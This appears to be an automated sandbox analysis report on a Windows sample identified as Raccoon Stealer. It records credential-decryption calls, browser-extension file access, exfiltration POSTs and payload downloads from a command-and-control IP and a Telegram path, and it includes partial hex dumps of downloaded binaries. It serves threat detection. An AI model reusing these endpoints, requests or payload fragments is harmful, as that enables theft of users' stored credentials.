Windows Analysis Report eLZzxG56uH.exe

AV Detection:

Multi AV Scanner detection for submitted file

Source: eLZzxG56uH.exe	Virustotal: Detection: 23%			Perma Link
Source: eLZzxG56uH.exe	ReversingLabs: Detection: 22%

Yara detected Raccoon Stealer

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

Machine Learning detection for sample

Source: eLZzxG56uH.exe

Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001EA130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,		0_2_001EA130
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E9F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,		0_2_001E9F5D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F4A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,		0_2_001F4A5F
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E0F09 __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,		0_2_001E0F09

Compliance:

Uses 32bit PE files

Source: eLZzxG56uH.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: eLZzxG56uH.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FEFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_001FEFDD

Enumerates the file system

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49744 -> 185.138.164.150:80

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DEPTELECOMNSO-ASRU DEPTELECOMNSO-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /tika31ramencomp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 54992Host: 185.138.164.150

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.138.164.150 185.138.164.150

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 06:53:34 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Downloads compressed data via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 06:53:37 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150

URLs found in memory or binary data

Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f
Source: eLZzxG56uH.exe, 00000000.00000003.311477945.0000000001738000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f.te
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150/D
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150/w
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150/~
Source: eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150:80//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6fiimedpic
Source: eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150:80/F2FB95FBD9F1696ome
Source: qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp, nssckbi.dll.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
